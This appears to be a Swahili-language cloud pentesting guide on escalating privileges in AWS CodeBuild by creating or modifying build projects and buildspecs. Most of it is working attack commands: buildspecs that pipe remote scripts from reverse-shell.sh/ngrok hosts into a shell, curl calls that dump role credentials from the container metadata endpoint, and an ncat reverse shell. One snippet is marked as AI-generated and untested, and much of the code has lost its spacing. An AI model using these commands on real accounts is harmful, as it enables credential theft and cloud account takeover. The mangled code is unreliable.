Mshambuliaji mwenye ruhusa za iam:PassRole, codebuild:CreateProject, na codebuild:StartBuild au codebuild:StartBuildBatch angekuwa na uwezo wa kuongeza mamlaka kwa jukumu lolote la IAM la codebuild kwa kuunda moja inayotumika.
# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"JSON="{\"name\": \"codebuild-demo-project\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"aws/codebuild/standard:1.0\",\"computeType\": \"BUILD_GENERAL1_SMALL\"},\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"}"REV_PATH="/tmp/rev.json"printf"$JSON"> $REV_PATH# Create projectawscodebuildcreate-project--cli-input-jsonfile://$REV_PATH# Build itawscodebuildstart-build--project-namecodebuild-demo-project# Wait 3-4 mins until it's executed# Then you can access the logs in the console to find the AWS role token in the output# Delete the projectawscodebuilddelete-project--namecodebuild-demo-project
# Generated by AI, not tested# Create a buildspec.yml file with reverse shell commandecho'version: 0.2phases:build:commands:- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash'>buildspec.yml# Upload the buildspec to the bucket and give access to everyoneawss3cpbuildspec.ymls3:<S3_BUCKET_NAME>/buildspec.yml# Create a new CodeBuild project with the buildspec.yml fileaws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
# Start a build with the new projectawscodebuildstart-build--project-namereverse-shell-project
Matokeo Yanayowezekana: Privesc moja kwa moja kwa jukumu lolote la AWS Codebuild.
Katika kontena ya Codebuild faili /codebuild/output/tmp/env.sh inaleta pamoja vars zote za mazingira zinazohitajika kupata siri za metadata.
Faili hii inaleta variable ya mazingira AWS_CONTAINER_CREDENTIALS_RELATIVE_URI ambayo inaleta njia ya URL ya kupata siri. Itakuwa kitu kama hiki /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420
Ongeza hiyo kwenye URL http://169.254.170.2/ na utaweza kudump siri za jukumu.
Zaidi ya hayo, inaleta pia variable ya mazingira ECS_CONTAINER_METADATA_URI ambayo inaleta URL kamili ya kupata maelezo ya metadata kuhusu kontena.
Kama ilivyo katika sehemu iliyopita, badala ya kuunda mradi wa kujenga unaweza kuubadilisha, unaweza kuonyesha Jukumu la IAM na kuiba token
REV_PATH="/tmp/codebuild_pwn.json"# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"# You need to indicate the name of the project you want to modifyJSON="{\"name\": \"<codebuild-demo-project>\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"aws/codebuild/standard:1.0\",\"computeType\": \"BUILD_GENERAL1_SMALL\"},\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"}"printf"$JSON"> $REV_PATHawscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build--project-namecodebuild-demo-project
Athari Inayowezekana: Privesc moja kwa moja kwa jukumu lolote la AWS Codebuild.
Kama ilivyokuwa katika sehemu iliyopita lakini bila idhini ya iam:PassRole, unaweza kutumia ruhusa hizi kubadilisha miradi ya Codebuild iliyopo na kupata ufikivu wa jukumu ambalo tayari wamepewa.
REV_PATH="/tmp/codebuild_pwn.json"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"# You need to indicate the name of the project you want to modifyJSON="{\"name\": \"codebuild_lab_3_project\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",\"computeType\": \"BUILD_GENERAL1_SMALL\",\"imagePullCredentialsType\": \"CODEBUILD\"}}"printf"$JSON"> $REV_PATH# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!awscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build-batch--project-namecodebuild-demo-project
REV_PATH="/tmp/codebuild_pwn.json"# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"JSON="{\"name\": \"<codebuild-demo-project>\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",\"computeType\": \"BUILD_GENERAL1_SMALL\",\"imagePullCredentialsType\": \"CODEBUILD\"}}"# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!printf"$JSON"> $REV_PATHawscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build--project-namecodebuild-demo-project
Matokeo Yanayowezekana: Privesc moja kwa moja kwa majukumu yaliyounganishwa ya AWS Codebuild.
SSM
Kwa idhini za kutosha za kuanza kikao cha ssm, inawezekana kuingia ndani ya mradi wa Codebuild unaojengwa.
Mshambuliaji anayeweza kuanza/kuanzisha upya ujenzi wa mradi maalum wa CodeBuild ambao unahifadhi faili yake ya buildspec.yml kwenye kisanduku cha S3 ambacho mshambuliaji ana ufikiaji wa kuandika, anaweza kupata utekelezaji wa amri katika mchakato wa CodeBuild.
Kumbuka: mchakato wa kuboresha ni muhimu tu ikiwa mfanyakazi wa CodeBuild ana jukumu tofauti, kwa matumaini lenye mamlaka zaidi, kuliko la mshambuliaji.
awss3cps3://<build-configuration-files-bucket>/buildspec.yml./vim./buildspec.yml# Add the following lines in the "phases > pre_builds > commands" section## - apt-get install nmap -y# - ncat <IP> <PORT> -e /bin/shawss3cp./buildspec.ymls3://<build-configuration-files-bucket>/buildspec.ymlawscodebuildstart-build--project-name<project-name># Wait for the reverse shell :)
Unaweza kutumia kitu kama hiki builspec kupata reverse shell:
Athari: Privesc moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambalo kawaida lina mamlaka makubwa.
Tafadhali kumbuka kuwa buildspec inaweza kutarajiwa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kufungua, kuhariri buildspec.yml kutoka kwenye saraka kuu, kuzip tena na kupakia